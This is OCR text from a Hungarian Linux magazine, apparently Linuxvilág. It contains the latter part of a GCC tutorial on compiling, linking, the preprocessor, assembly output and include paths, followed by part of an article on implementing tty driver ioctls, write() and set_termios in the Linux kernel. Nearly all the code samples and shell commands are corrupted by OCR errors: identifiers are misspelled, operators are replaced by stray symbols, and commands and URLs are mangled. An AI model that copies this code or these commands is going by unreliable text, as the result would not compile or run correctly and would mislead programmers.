denki számára olvashatóvá teszik, és írhatóvá varázsolják a 
fejlesztők számára, akik közül néhány vezető személynek joga 
van ahhoz, hogy a javasolt változtatásokat elfogadja vagy 
elutasítsa. Az alkotók szerint a fejlesztés végső célja az, hogy 

a GCC legyen a világ legjobb fordítója, ezért mindenkitől szí- 
vesen fogadják a segítséget, és mindenkit szeretettel várnak 

a fejlesztők levelezési listáin. Gyakorta adnak ki frissítéseket, 
amelyek általában nem teljességgel megbízható változatok, 
hanem úgynevezett pillanatképek (snapshots), és azt mutatják, 
hogy éppen hol tartanak a kódolási munkák. Elvárják azt is, 
hogy az esetleges hibákról értesítést kapjanak. 
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A fordítás 

A GCC nem teljes fejlesztőkörnyezet, hanem parancssori for- 
dító. Kezdetnek írjuk be a következő rövid C nyelvű programot 
egy szövegszerkesztőbe, majd linuxvilag.c néven mentsük: 
tinclude cstdio.h: 


int main() 


( 
peinté(Tiinüxvilagya") ; 
return(0) ; 


] 


Majd egy parancsértelmezőben adjuk ki a következő parancsot: 
2. gec litiüxvilád. € 


www.linuxvilag.hu 


Most és a továbbiakban a : jel nem része a parancsnak, hanem 
a parancssorjel, ami a rendszergazda esetében például kettős 
kereszt (77) lehet. A fordítás eredménye egy a.out nevű futtat- 
ható állomány, ami az alapértelmezett elnevezés. Ha a lefordí- 
tott fájlt bármilyen szövegnézővel megnézzük, láthatjuk, hogy 
a fájl első négy betűje a .ELF. Az ELF az Executable and 
Linkable Format szavak rövidítése, ami futtatható és összeépít- 
hető formátumot jelent. Manapság ez az alapértelmezett fájl- 
formátum, és mind a futtatható, mind a könyvtárállományok 
a fordítás során elf formátumot kapnak. Nekem az elf szóról 
mindig a manók jutnak eszembe, hiszen a szónak ez az eredeti 
angol jelentése. 
Ha a bináris állománynak nem az alapértelmezett a.out elne- 
vezést akarjuk adni, a -o kapcsoló használatával ezt tudatnunk 
kell a fordítóval: 
5 gcc linuxvilag.c -o linuxvilag 
Most a lefordított állomány neve linuxvilag lesz. Ennek a kap- 
csolónak a hatására a GCC a kimenetét a megadott nevű fájlba 
küldi, függetlenül attól, hogy az futtatható program, bináris 
állomány vagy assembly kód volt-e. Például írjuk be a követ- 
kező rövid kódrészletet: 
struct Ouaternion í( 

int Oo; 

int X; 

i€ 37; 

int Z; 
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void printOuaternion(struct Ouaternion ra) 
t 

printf("sd, sd, $d, sdWwa" , d-50,9d-53xXx, d-s5y, d-52) ; 
5 
Mint tudjuk, a guaterniók hiperkomplex számok, amelyeket az 
a-t bit-cj4-dk alakban írhatunk fel, ahol 12 — -I, j2 — -1, k2 — -1 
és ij — k, ji — -k, jk — i, kj — -i, ki — j, ik — -j. A hiperkomplex 
számok tulajdonképpen a komplex számok kiterjesztései, és 
gyakoriak a vektoralgebrában, ahol többek között tetszőleges 
térbeli elforgatások előállítására használhatjuk őket. A mi 
guaternion szerkezetünk egy ilyen négyes számot jelképez, 
és rövidke forráskódunk a printOuaternion () függvény 
segítségével megjeleníti azt a parancssoron. Miután beírtuk, 
és guaternion.c néven mentettük a forrásfájlt, fordítsuk le a 
következő paranccsal: 
s: gcc -c guaternion.c -o guaternion.o 
A -c és -o kapcsolók most azt mondják a fordítónak, hogy a 
guaternion.c nevű forrásfájl lefordított kódját a guaternion.o 
fájlba tegye. Nem meglepő, hogy ez a bináris fájl nem futtat- 
ható! Ahhoz, hogy egy C- vagy C4 -1--állomány futtatható 
legyen, meg kell adnunk valahol egy main nevű függvényt, 
ami minden programindításkor elsőként fut le. lehát a 
linuxvilag.c nevű fő fájlunk így fog kinézni: 
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Hinclude "guaternion.h" 


struct Ouaternion guaternion - (0,1,2,3]); 


int main() 

( 
printOuaternion( guaternion,) ; 
return(0) ; 

] 

A printOuaternion() függvény meghatározását a 

guaternion.c nevű forrásfájlba tesszük: 

Hinclude cstdio.h: 

Hinclude "guaternion.h" 


void printOuaternion(struct Ouaternion "a) 
t 

printt("sd,$d, sd, di" g-sösg-exk gesy,dgesz)i 
A guaternion szerkezet és a printOuaternion ( ) függvény 
meghatározásait a guaternion.h fejállományba tesszük: 
Hifndef OUATERNION H. 
Hdefine OUATERNION H. 


struct Ouaternion í( 
int Oo; 
int X; 
int. yi 
int Z; 


void printOuaternion(struct Ouaternion §9g) ; 


Hendif /r OUATERNION H §F/ 

A fejállományba egy úgynevezett állományőrszemet építettem 
be, ami megakadályozza, hogy a fordítóprogram ezt a fejállo- 
mányt többször is feldolgozza, hiszen amikor először találkozik 
vele, értéket ad a OUATERNION H makrónak, másodszor vagy 
harmadszor viszont már mindent figyelmen kívül hagy, ami 

a tifndef és Hendif fordítási irányelvek között van. 

Most már mindkét fájlt az ismert módon egyenként lefordíthatjuk: 
5 gec -c guaternion.c -o guaternion.o 

5 gec -ce linuxvilag.c -o linuxvilag 

Amikor azonban megpróbáljuk lefuttatni a fordító által létre- 
hozott linuxvilag bináris állományt, az , Engedély megtagadva" 
üzenetet kapjuk: 

bash: ./linuxvilag: Permission denied 

A linuxvilag fájlnév előtti ./ karakterek a pillanatnyi munka- 
könyvtárra utalnak. Miután az 1s -1 paranccsal listázzuk a 
könyvtár tartalmát, látjuk, hogy a linuxvilag állomány írható 

és olvasható, de nem futtatható, mert nem látjuk az x betűt: 
-rwWw-r r 1]. ratio users 904 FEB 
8 23:14 linuxvilagtg" 

Nem esünk kétségbe, hanem a chmod parancs segítségével 
saját magunk számára futtathatóvá tesszük az állományt: 

s: chmod urx linuxvilag 

De ismét csalatkoznunk kell, hiszen most a , Nem tudom 
futtatni a bináris állományt" üzenetet kapjuk: 

bash: ./linuxvilag: cannot execute binary file 
Némi gondolkodás után arra a következtetésre juthatunk, 
hogy hiába hoztuk létre a guaternion.o és a linuxvilag bináris 
állományokat, semmit sem tudnak sem egymásról, hiszen nem 
kapcsoltuk össze őket. A GCC az összekapcsolást (linking) is 
megteszi, de a megfelelő utasításokat kell neki adnunk: 
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s: gec -c guaternion.c -o guaternion.o 

s gc -ő linüxvilag. GC -o linüxvilag.ö 

s: gec guaternion.o linuxvilag.o -o linuxvilag 
Az összekapcsolás az utolsó sorban történik, ahol a GCC a 
guaternion.o és linuxvilag.o bináris állományokat fűzi össze a 
linuxvilag nevű tuttatható állománnyá. Most már a linuxvilag 
program tudni fog mind a guaternion.o, mind pedig a 
linuxvilag.o bináris állományok tartalmáról. 

Nem feltétlenül kell minden egyes .c kiterjesztésű forráskód- 
fájlt .o kiterjesztésű bináris fájllá alakítani. A következő 
paranccsal a forrásfájlokból közvetlenül kapjuk az összekap- 
csolt futtatható állományt: 

s: gec guaternion.c linuxvilag.c -o linuxvilag 


A fordítás szakaszai 
A megfelelő kapcsolók használatával a többlépcsős fordítási 
folyamatot megszakíthatjuk, és megtekinthetjük a létrehozott 
állományokat. 
1. Az előfeldolgozó 
A futtaható állomány létrehozásának folyamatában nemcsak 
fordítás és összekapcsolás szerepel, hanem előfeldolgozás is. 
Valójában nem a fordító kapja meg elsőként a forráskódot, 
hanem az úgynevezett előfeldolgozó (preprocessor), azaz 
a cpp program. Írjuk be a következő parancsot: 
s epp linuxvilag. c linúxvilagd.i 
Most pedig egy szövegszerkesztőben nézzük meg a 
létrejövő, előfeldolgozott linuxvilag.i fájlt. A .i kiterjesztés 
nem véletlen, hiszen általában ezt adjuk a feldolgozott 
állományoknak. Hagyományosan a következő 
kiterjesztéseket használhatjuk: 


.h fejállomány az előfeldolgozó számára 
.C előfeldolgozásra szoruló C-forráskód 
.C előfeldolgozásra szoruló C-t t--forráskód 


..c —— előfeldolgozásra szoruló C-t 1--forráskód 


.-pp  előfeldolgozásra szoruló C- 1--forráskód 
.cxx előfeldolgozásra szoruló C-- 4--forráskód 

.m  —  Objective-C forráskód 

A előfeldolgozott C-állomány 

di előfeldolgozott C-- -4--állomány 

.S előfeldolgozásra szoruló assembly forráskód 
.§ előfeldolgozott assembly forráskód 

.o lefordított tárgykódfájl 

.a lefordított könyvtárállomány 


.so —— lefordított könyvtárállomány 


Az előfeldolgozó a fejállományokat hozzáfűzi a forráskód- 
hoz, lehetővé téve, hogy feltételes fordítási irányelveket 
adhassunk meg, és hogy makrókat hozhassunk létre, azaz 
olyan rövidítéseket, amelyek hosszabb szövegrészek helyett 
állnak. Ezeket a rövidítéseket az előfeldolgozó kibontja, 
és önműködően behelyettesíti a makrók helyébe. 
A gcc a -E kapcsolóval rávehető arra, hogy megálljon, 
miután az előfeldolgozó elvégezte a munkáját: 
2. .gca -E linuxvilag. c -o linuxvilag épp 
A példában az előfeldolgozott állomány a linuxvilag.cpp lesz. 
Mind a súgó, mind pedig az info oldalakon hangsúlyozzák, 
hogy az előfeldolgozót csak C vagy azzal együtműködő 
programozási nyelvekkel használjuk! 

2. Az assembly forráskód 
A C nyelvű forráskódot a GCC a következő lépésben 
assembly forráskóddá alakítja át. Ennél a folyamatnál is 
megállhatunk a -S kapcsoló használatával: 
a ge S linüxvilág. c 





Mivel kimeneti fájlnevet nem adtunk meg, a GCC az 
assembly kódot alapértelmezetten egy .s kiterjesztésű 
állományba teszi. Ha más nevet akarunk neki adni, a -o 
kapcsolót kell használnunk: 

5 gcc -S linuxvilag.c -o lv.s 

A fenti, legelső lhinuxvilag.c forráskód assembly forráskódja 


így néz ki: 
.tile Slimiaxviláag c! 
.version "OT. 01 
gacz compiled. : 
. section . rodata 
. 1CO : 
:etrindg "Linuxvilagn" 
. text 
. alian 16 
. globl main 
.type main, ofunction 
main: 


pushl S5ebp 
movl sS$esp, sebp 
subl $S8, sesp 
addl $S-12, sesp 
pushl $S.L1CO 
call pEintE 
addl $16,5esp 
xorl S5eax, seax 
jmp .L2 
.p2align 4,,7 


s. h2.3 
movl sS$ebp, sesp 
popl sSsebp 
ret 
. Lfel: 
.size main, . Lfel-main 
.ident "GCC: (GNU) 2.95.3 20010315 
s SÚSB)" 


PL 


3. A tárgykód előállítása 
A harmadik lépésben a GCC az assembly forráskódot tárgy- 
kóddá alakítja, aminek alapértelmezetten .o a kiterjesztése. 
A fordítást a -x kapcsolóval bárhonnan újrakezdhetjük: 
5 gecc -x c -c linuxvilag.i -o linuxvilag.o 
A -x kapcsoló utáni c betű a C nyelvre utal, és a helyébe 
a következő nyelvek nevei helyettesíthetők be: c, 
objective-c, Cct, Cc-header, cpp-output, C--64-cpp 
-output, assembler és assembler-with-cpp. 
Magát a fordítást az as program végzi, ami nem más mint 
a GNU assembler. Ezt nekünk nem kell külön lefuttatni, 
a GCC hívja meg helyettünk. 

4. Az összekapcsolás 
Az utolsó lépésben az összekapcsoló (linker) összefűzi a 
tárgykódfájlokat, elrendezi azok adatait és összeköti a szim- 
bólumtáblákat, majd futtatható állományt készít belőlük. 
A GNU összekapcsoló program az 1ad. Ha kíváncsiak 
vagyunk rá, hogy egy tárgykódfájlban milyen szimbólumok 
vannak, adjuk ki az nm parancsot, például: 
5: nm guaternion.o 
00000000 €t gcc2Z compiled. 
00000000 T printOuaternion 

ŰÚ printf 

Az első sorban a hexadecimális számként megadott érték 
a tagnak a kezdő címhez viszonyított helyzetét mutatja, a 
T betű arra utal, hogy a hozzá tartozó szimbólumot a tárgy- 
kódhoz tartozó forráskódban határozták meg, az U betű 
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pedig arra, hogy ezt valahol máshol, egy másik forrásfájlban 
tették meg. Ha kisbetűket látunk, a szimbólum hatóköre 
helyi (local), ha nagybetűs, akkor globális. 

Az nm program olyankor jön jól, amikor kíváncsiak vagyunk 
arra, hogy egy tárgykódfájlban egy adott nevű függvény 
megtalálható-e. Látjuk például, hogy a fenti listázás szerint 
a guaternion.o bináris állomány a printOuaternion és 
printf nevű függvényeket tartalmazza, amit a forráskód 
ismételt megtekintésével ellenőrizhetünk is. 

A GCC a fenti négy lépést általában elrejti előlünk, és a 
futtatható állományt, ha megfelelő utasításokat adunk neki, 
egy lépésben állítja elő. 


A fejállományok elérhetősége 

Ha a Linuxvilág CD-mellékletén a Magazin/gcc/code/example04 
és Magazin/gcc/code/example05 könyvtárak tartalmát össze- 
hasonlítjuk, azt látjuk, hogy az example05 példánál a 
guaternion.c forrásfájlt és a guaternion.h fejállományt változ- 
tatás nélkül átmásoltam a guaternion alkönyvtárba. Ha most 

az example05 mappában a linuxvilag.c állományt a szokott 
módon le akarom fordítani, a következő hibaüzenetet kapom: 
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GC: guúáternionsc: No 8uUch file or directory 
linuxvilag.c:2: dguaternion.h: No such file or 
directory 


Nem különösebben meglepő, hogy a fordítóprogram az 
elkülönített fájlokat nem találja, hiszen azok nincsenek 
ugyanabban a munkamappában, mint ahonnan megkíséreltem 
a fordítást. Hiába keresi tehát őket — végül kiírja a , Nincs ilyen 
fájl vagy mappa" hibaüzenetet. Még azt is megtudjuk, hogy a 
keresett guaternion.h fejállományra a linuxvilag.c forrásfájl 
második sorában hivatkozunk. 

Nincs mit tennünk tehát, meg kell adnunk a keresett fájlok 

s gec ./dguaternion/guaternion.c linuxvilag.c 
5.1I./guaternion -o linuxvilag 

A fordítónak a -I kapcsolóval a fejállományok helyét adhatjuk 
meg. Felmerülhet bennünk a kérdés, hogy a fordító miért nem 
keresi a szintén ismeretlen helyen lévő stdio.h fejállományt. 
Nos, ez a fejállomány része a szabványos C be- és kiviteli ([/O) 
függvényeket tartalmazó könyvtárnak, ezért a fordító alapból 
eléri. Próbaképpen töröljük ki a ttinclude cstdio.h: sort 

a linuxvilag.c forráskódból, majd fordítsuk újra a programot! 


Szaló István 

(ratlosoftofreemail.hu) tanár, Immár több mint 
másfél évtizede foglalkozik programozással, de 
csak a Java és a Linux megismerése után tudta 
meg, hogy mi Is az igazi programozás. Több írása 
megjelent már a hazai számítástechnikai lapokban. 





Kapcsolódó címek 


A GCC Fordítógyűjtemény honlapja 3 http://gcc.gnu.org 
A GCC programhibáinak bejelentése 

5 htip:/gec-bugsagecHgnirorg 

A bazár stílusú fejlesztési modellről lásd a 

2 http://tuxedo.org/-—esrAwritings/cathedral-paper.html 
2 http://tuxedo.org/—esr/writings/cathedral-bazaar/ 
oldalakat és a CD-mellékletet! 
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A tty-réteg 2-2. rész) 





Az ioctl rendszerhívás azt jelenti, hogy a felhasználó az eszközt újra be szeretné 


, 


tember, 34—37. oldal) a tty-réteg alapjairól volt szó, 

valamint megbeszéltük, hogyan készíthetünk kicsi, de 
működő tty-meghajtót. Most néhány nehezebb rész magyará- 
zatával folytatjuk a tty-réteg feltárását. 
Emlékszünk még az első részből astruct tty driver-re, 
amelyet minden tty-meghajtónak meg kell valósítania? Vizs- 
gáljuk meg most néhány olyan vonását, amit az elmúlt alka- 
lommal nem tárgyaltunk meg minden részletében. 


C ikksorozatom előző részében (Linuxvilág 2002. szep- 


101 ioctis 

A struct tty driver ioct1 függvény visszahívását a tty- 

réteg indítja, amikor az ioct1 (2) hívása megtörténik az esz- 

közcsomóponton. Amennyiben a meghajtó nem tudja az áta- 
dott ioct1-értéket kezelni, egy -ENOIOCTLCMD értéket kell 
visszaadnia annak érdekében, hogy a tty-réteg megpróbálkoz- 
hasson egy általános hívással. De milyen ioct1-értékek keze- 
lésére érdemes meghajtónkat felkészítenünk? 

A 2.4.19-es rendszermag körülbelül hatvan különböző lehet- 

séges tty-ioct1-t határoz meg. A tty-meghajtónknak nem 

kell mindegyiket megvalósítania, de az alábbi általánosan 
használtakat mindenképpen érdemes: 

e TIOCMGET: erre a hívásra akkor kerül sor, amikor a fel- 
használó a soros kapu (például DIR- vagy RIS-vonalak) 
állapotát akarja lekérdezni. Amennyiben soros kapunk 
MSR- vagy MCR-regisztereit közvetlenül tudjuk olvasni, 
vagy ezek másolatait helyben tároljuk (mint ahogyan 
néhány USB-soros eszköz számára ez szükséges), az ioct1 
megvalósítása például az alábbi módon történhet: 

int. tíny 106€L Wletruúct ttv strúöt "EGY; 


struct file "file, unsigned 
sínt cmd, unsigned long arg) 


strüct tciíiny private Ftp s tÉy-espeivató; 


if (cmd -- TIOCMGET) ( 
unsigned int result - 0; 
unsigned int msr - tp-:msr; 
unsigned int mcr - tp-:mcr; 


result - ((mcr § MCR DIR) 
5? TIOCM DTR: 0) 
/r DIR is set §Y/ 


]l ((mcr § MCR RTS) 
9? TIOCM RTS: 0) 
/r RIS is set F/ 


]l ((msr § MSR CTS) 


9? TIOCM CTS: 0) 
/r CIS is set F/ 
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állítani. Most megmutatjuk, hogyan kezeli mindezt az eszközmeghajtó. 


] ((msr § MSR CD) 
9? TIOCM CAR: 0) 
/r Carrier detect is setr/ 
] ((msr § MSR RI) 
5? TIOCM RI: 0) 
/: Ring Indicator is set §Y/ 


]l ((msr § MSR DSR) 
s? TIÓCM DSRz 0) 
/r DSR is set F/ 


if. (copy to üserl (unsigned int $járg, 
€result, 
ssizeof(unsigned int) ) ) 
return -EFAULI; 
return 0; 


] 


return -ENOLOCILCMD; 


e TIOCMBIS, TIOCMBIC és TIOCMSET: a tty-eszköz külön- 


böző modemvezérlő regisztereinek beállítására használatos. 
A TIOCMBIS hívás bekapcsolja az RIS, DTR, illetve hurok- 
eszköz (loopback) regisztereket, míg a TIOCMBIC hívás 
kikapcsolja őket. A TIOCMSET hívás mindhármat kikap- 
csolja, és csak a meghatározott értékeket állítja be. Lássunk 
egy példát ennek kezelésére: 
int tíiny 10€€1 Tetruct tty etrúdt FEÉtyY, 

struct file Ffile, 

unsigned int cmd, 

unsigned long arg) 


estruct tiíiny private "tp -— tty-sprivates; 


if ((cmd -- TIÓCMBIS) [1] 
(cmd -- TIOCMBIC) ]] 
(cmd -- TIOCMSET)) ( 
unsigned int value; 
unsigned int mcr - tp-:3mcr; 


if íicopy from üserliévalúe; 
s (unsigned int $Y)arg, 
ssizeof(unsigned int) ) ) 
return -EFAULI; 


switch (cmd) í( 
case TIOCMBIS: 
it W(valuúé § TIOCM RTS) 


amor Jz MCR RTS; 

if (value §. TIOCM DTR) 
sejör [E MCR RTS; 

if (value €§ TIOCM LOOP) 
Smcr ][- MCR LOOPBACK; 

break; 





case TIÓCMBIC: 

if (value §€ TIOCM RTS) 
emer Ez SMCR. RTS; 

if (value § TIOCM DTR) 
mer §- cMCR RIS; 

if (value € TIOCM LOOP) 
Smcr §- -MCR LOOPBACK; 

break; 


case TIOCMSET: 
/:r turn off the RTIS and DTR and 
x LOOPBACK, and then only turn on 
x what was asked for F/ 


mer §€-  -(MCR RTS ] MCR DTR 
s ] MCR LOOPBACK) ; 

mer ]- ((value § TIOCM RTS) 

sm ? : 0); 
mer ][- ((value § TIOCM DTR) 

es 3 ER OTR : 0]3 
mcr [- ((value § TIOCM LOOP) 

mm ? MCR LOOPBACK : 0); 
break; 


] 


/F set the new MCR value in the 
device X/ 

tp-:mcr - mcr; 

return 0; 


] 


return -ENOIOCTLCMD; 

) 

Figyeljünk arra, hogy a hurokeszköz hívása (TIOCM LOOP) a 

2.2-es rendszermagból még hiányzik, de a 2.4-esben és az annál 

újabbakban már használható. 

Ha tty-meghajtónk kezelni képes ezt a négy ioct1-t, a fel- 

használói programok nagy részével már együtt tud működni, 

bár mindig akad olyan program, amely valamilyen más 
ioct1-t igényel. Emiatt úgy is dönthetünk, hogy közülük is 
kezelni fogunk néhányat: 

e  TIOCSERGETLSR: a tty-eszközünkhöz tartozó vonalállapot- 
regiszter (Line Status Register — LSR) értékének visszake- 
resésére használatos. 

e . TIOCGSERIAL: hívásával eszközünk soros vonalának 
adatait egyszerre nyerhetjük vissza. Ehhez egy mutató 
kerül átadásra, ami serial struct szerkezetű, és ame- 
lyet a meghajtónknak kell a megfelelő értékekkel feltöl- 
tenie. Néhány program (mint a setserial vagy a dip) 
a függvényt arra használja, hogy megállapítsa, jól lett-e 
beállítva az átviteli sebesség, valamint hogy tty-eszközünk 
típusáról általános adatokat gyűjtsön be. Íme egy példa 
ennek lehetséges megvalósítására: 

ii tiny 1octlL léttuúuct Cty strüct FÜEY; 

struct file "Ffile, 
unsigned int cmd, 
unsigned long arg) 


ettüúct tiny private "tp s tty-sbtivate; 


if (cmd -- TIOCGSERIAL) ( 
etrüct sétial strüct tp; 


if (!arg) 
return -EFAULI; 
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memset (tmp, 0, sizeof(tmp) ) ; 


tmp . type - tp-:type; 
tmp.line - tp-:51line; 
tmp.port s tt p-sport; 
tmp .irg z.  £0-Ssiro; 
tűmp.flags : ASYNC SKIP TEST 


— ] ASYNC AUTO IRO; 
Ép. XMILE. Fito Sí128é s Ép-sxmit. 
SELLŐ SIZE i 


tmp.baud base s" tpszbaud. base; 
to . close delay — 5YHZ; 
tűp.closing wait  — 30"EBZ; 


tó. cüstom dívisor s €tp-sCcúst ton 
a dívisot; 

tmp . hub6 s Üp-zmioő; 

tmp.io type s tp-sio tTYypéI 
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if (copy to user(arg, 6tmp, 
ssizeéoflstrutt Serial strüct)) ) 
return -EFAULI; 

return 0; 


] 


return -ENOIOCILCMD; 


TIOCSSERIAL: a TIOCGSERIAL ellentéte; ennek segít- 
ségével eszközünk soros vonalának állapota egy lépésben 
állítható be. A hívás számára át kell adni az eszköz kívánt 
beállításának megfelelő adatokkal feltöltött 

serial struct szerkezetre mutató pointert. Ha eszkö- 
zünk ezt a hívást nem is kezeli, csaknem minden program 
megfelelően fog működni. 

TIOCMIWAIT: ez egy igen érdekes hívás. Amikor a felhasz- 
náló ilyen ioct1-hívást küld, az addig a rendszermagban 
várakozik, amíg a tty-eszköz MSR-regiszterében valamilyen 
változás nem áll be. Az arg kapcsoló tartalmazza annak 
az eseménynek a típusát, amire a felhasználó várakozik. 
Ezt az ioct1-t gyakran használják az állapotvonalon tör- 
ténő változásra várás közben, jelezve, hogy az adatok 
készen állnak az eszközre való küldésre. 

TIOCMIWAIT: ennek ioct1-megvalósításánál körülte- 
kintően kell eljárnunk. Szinte minden ezt használó rend- 
szermagmeghajtó használja az 

interruptible sleep on() hívást is, ami nem biz- 
tonságos. Ehelyett célszerű egy wait gueue-t (várakozási 
sor) használni, amellyel mindezek elkerülhetők. 

A TIOCMIWAIT megvalósításának egyik helyes módjára 
az alábbiakban láthatunk példát: 


int tiny 10cCEl l8ttrúct Üty 8trüct $FÉEV, 


struct file "Ffile, 
unsigned int cmd, 
unsigned long arg) 


ettüúct tiny örivate tp s ttLYy-spEr1VACS; 
if (cmd -- TIOCMIWAIT) ( 
DECLARE WAITOUEUE (wait, current) ; 
etruct agyna icouünt cnow; 


struct agyüc icount Cprev; 


cprev - tp-sicount; 
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while (1) ( 
add wait gueue(6tp-:wait, 6wait) ; 
set current state(TASK INTERRUPTIBLE) ; 
schedület) ; 
remove wait gueue(6tp-:cwait, 


— wait) ; 


/F see if a signal woke us up "/ 
if (signal pending(current) ) 
return -ERESTARISYS; 


enow -. edge port-sicount ; 

if (cnow.rng -- cprev.rng §6 
cnow.dsr -- cprev.dsr 6685 
cnow.dcd -- cprev.dcd 668 
cnow.cts -- cprev.cts) 
return -EIO; 
/: no change -35 error §/ 


if (((arg § TIOCM RNG) §6 
(cnow.rng !- cprev.rng)) [] 

((arg € TIOCM DSR) §6é 
(cnow.dsr !- cprev.dsr)) [] 

((arg € TIOCM CD)  §é 
(cnow.dcd !- cprev.dcd)) [] 

((arg € TIOCM CTS) §ő 
(cnow.cts !- cprev.cts)) ) 


return 0; 


] 


cprev - cnow; 


] 


return -ENOIOCITLCMD; 
I) 
Az MSR-regiszter változását a fenti kódrészletben található 
wake up interruptible(£tp-:wait) ; 
sor érzékeli, ennek hívása biztosítja a kód helyes működését. 
e . TIOCGICOUNT: segítségével a felhasználó megtudhatja 
az előfordult soros vonali megszakítások számát. 
A hívás a rendszermagnak egy megfelelően feltöltött 
serial icounter struct szerkezetre mutató mutatót 
(pointert) kell átadjon. Ez a hívás gyakran használatos az 
imént tárgyalt TIOCMIWAIT ioct1-hívással együtt. 
Ha az eszközmeghajtónk működése közben bekövetkező 
összes megszakítást nyomon követjük, a hívást megvalósító 
kód egészen egyszerű is lehet. Erre a 
drivers/usb/serial/io edgeport.c fájlban láthatunk példát. 


A write() szabályai 

Atty struct write () hívása történhet megszakítási 
környezetből és felhasználói környezetből egyaránt. Ezt azért 
fontos tudni, mert megszakítási környezetből nem szabad 
olyan függvényt hívni, amelyik ideiglenesen felfüggesztheti a 
működését. Ide tartoznak azok a függvények, amelyek esetleg 
a schedule () függvényt hívhatják, többek között az olyan 
gyakran használt függvények, mint a copy from user(), 

a kmalloc () és a printk ( ) . Ha mindenáron szüneteltetni 
akarjuk a működést, a pillanatnyi állapotot először az 

in interrupt () függvény hívásával ellenőrizzük. 

A write () hívása történhet olyankor, amikor maga a tty- 
alrendszer szeretne adatokat küldeni a tty-eszközön keresztül. 


aj úl 
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Ez akkor fordulhat elő, haa tty struct szerkezetben nem 
valósítjuk megaput char () függvényt. (Emlékezzünk, 
hogyha nincs put char() függvény, a tty-réteg a write ( ) 
függvényt fogja használni.) Ez akkor jellemző, amikor a tty- 
réteg egy újsorkaraktert soremelés és újsorkarakterré szeretne 
átalakítani. A legfontosabb, amit ebben az esetben meg kell 
jegyeznünk, hogy write () függvényünk ilyen hívás esetén 
nem adhat vissza 0 értéket. Ez annyit tesz, hogy ezt az adat- 
bájtot mindenképpen ki kell küldeni az eszközre, mivel a hívó 
(a tty-réteg) nem tárolja az adatot, hogy később próbálkozzon 
az adatküldéssel. Mivel a write () nem tudja megállapítani, 
vajonaput char() helyett hívták-e — még egy bájt adat 
átküldése esetén sem -, lehetőleg úgy írjuk meg a write () 
függvényt, hogy legalább egy bájt adatot mindig fogadni 
tudjon. Számos USB-soroskapu-átalakító tty-meghajtó nem 
követi ezt a szabályt, ebből kifolyólag néhány végberendezés, 
ha ezen keresztül csatlakoztatjuk, nem működik megfelelően. 


A set termios() megvalósítása 
A set termiosw() függvényhívás megfelelően működő meg- 
valósításához meghajtónknak képesnek kell lennie a termios- 
szerkezet összes lehetséges beállításának visszafejtésére (dekó- 
dolására). Ez meglehetősen bonyolult feladat, mivel a kapcso- 
lattartó vonal összes beállítása ebbe a szerkezetbe van különféle 
módokon belesűrítve. 
Listánkon (41. CD Magazir/tty könyvrár) a set termios-() 
hívás egy egyszerű megvalósítását mutatja, amely a felhasználó 
által kért összes különböző vonalbeállítást a rendszermag hiba- 
keresési naplójába rögzíti. 
Először is készítsünk egy másolatot a tty-szerkezet cflags 
változójáról, ezt sokszor fogjuk használni a következőkben: 
unsigned int cfílag; 
crlág s tty-stermios-sc. ceflag; 
Ezután vizsgáljuk meg, hogy szükségesek-e további lépések. 
Ellenőrizzük például, hogy a felhasználó nem próbálkozik-e 
az általunk éppen használt beállításokkal. Ne dolgozzunk 
feleslegesen, ha nem szükséges. 
x check that they really want us to change 
x something "/ 
if (old termios) ( 
it ((eflag ss üld térműiós-ze cflag) 
(RELEVANT IFLAG 
s ety-etérmios-sű jÉlag) es 
RELEVANI IFLAG 
5 (old termios-:c iflag))) ( 
printk (KERN DEBUG 
szü! . nothing to chande... na") ; 
return; 


ózár 


] 
J 
A RELEVANT IFLAG() makró meghatározása: 


tdefine RELEVANT IFLAG(iflag) 

(iflag § 0 (IGNBRK]BRKINTIIGNPARI PARMRKI INPCK) ) 
Ez a cflags változó fontos bitjeinek kimaszkolására haszná- 
latos. Hasonlítsuk össze a kapott értéket a korábbi értékkel, hogy 
megállapíthassuk, van-e különbség. Ha nincs, semmit sem kell 
tennünk, visszatérhetünk. Vegyük észre, hogy mielőtt az 
old termios változó adatmezőjét megpróbáltuk volna elérni, 
először azt ellenőriztük, hogy a mutató éppen mutat-e valahova. 
Ez a vizsgálat feltétlenül szükséges, hiszen előfordulhat, hogy a 
változó NULL értéket tartalmaz. Egy NULL értékű mutató mező- 
jének visszakérdezése csúnya hibát okoz a rendszermagban. 





Most, miután már tudjuk, hogy változtatnunk kell a beállítá- 
sokon, nézzük a kívánt adatméretet: 
/:r get the byte size F/ 
switch (cflag § CSIZE) ( 
case CS5: 
printk (KERN DEBUG vk s 
break; 
case CS6: 
printk 
break; 
case CS/7: 
printk 
break; 
default : 
case CS8: 
priritk 
break; 


data bits 5An") ; 


(KERN DEBUG " - data bits - en"); 


(KERN DEBUG " - data bits — 7"); 


(KERN DEBUG " - data bits - 8"); 


Maszkoljuk a cflag változót a CSIZE bitmezővel, és vizsgál- 
juk meg az eredményt. Ha nem tudjuk megállapítani, mely 
bitek voltak beállítva, az alapértelmezett 8 adatbitet is használ- 
hatjuk. Ezután a kívánt párosságot (parity) ellenőrizzük: 
/: determine the parity "/ 
if (cflag § PARENB) 
if (cflag § PARODD) 
printk (KERN DEBUG 
sz" . parity oddWü" ) ; 
else 
printk 
tam TT 


(KERN DEBUG 

- parity event") ; 

else 
printk 
tam. IT 


(KERN DEBUG 
- parity nonein") ; 
Először annak nézzünk utána, hogy a felhasználó akar-e vala- 
milyen párosság ellenőrzését használni. Ha igen, ellenőriznünk 
kell, hogy melyik fajtát szeretné (párosat vagy páratlant). 
A stop-bit beállítás ellenőrzése is egyszerűen végrehajtható: 
/: figure out the stop bits reguested F/ 
if (cflag § CSTOPB) 
printk (KERN DEBUG " 
else 
printk (KERN DEBUG " - stop bits - 1"); 
Most már folytathatjuk a megfelelő adatáram-vezérlés beállí- 
tásaival. Egy egyszerű módszerrel eldönthetjük, hogy használ- 
nunk kell-e az RIS/CIS-t: 
/F figure out the flow control settings "/ 
if (cflag § CRISCIS) 


- stop bits 2" ya 


printk (KERN DEBUG 
e" - RTS/CIS is enabledtn") ; 
else 
printk (KERN DEBUG " - RTS/CIS is disabled") ; 


A különböző programból megvalósított adatáram-beállítások, 
továbbá az indító és leállító karakterek meghatározása egy 
kicsit bonyolultabb: 
/:r determine software flow control F/ 
/F if we are implementing XON/XOFF, set the 
x start and stop character in the device F/ 
if (I IXOFF(tty) [] I IXON(tty)) ( 
ünisigned chat stop char s STOP CHARÍttyY); 
unsigned char start char - START CHAR(tty) ; 


/: if we are implementing INBOUND XON/XOFF F/ 
if (TI IXOFP(tty)) 
